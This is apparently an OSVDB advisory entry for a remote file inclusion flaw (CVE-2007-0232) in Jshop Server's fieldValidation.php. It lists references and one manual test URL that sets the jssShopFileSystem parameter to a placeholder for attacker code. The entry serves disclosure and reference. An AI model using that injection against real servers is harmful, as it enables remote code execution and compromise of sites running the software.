Jshop Server routines/fieldValidation.php jssShopFileSystem Variable Remote File Inclusion

2007-01-10T02:58:28
ID OSVDB:33459
Type osvdb
Reporter OSVDB
Modified 2007-01-10T02:58:28

Description

Manual Testing Notes

http://[target]/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

References:

Vendor URL: http://www.jshop.co.uk/ Other Advisory URL: http://securityreason.com/securityalert/2146 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0305.html ISS X-Force ID: 31425 Generic Exploit URL: http://milw0rm.com/exploits/3113 CVE-2007-0232 Bugtraq ID: 21995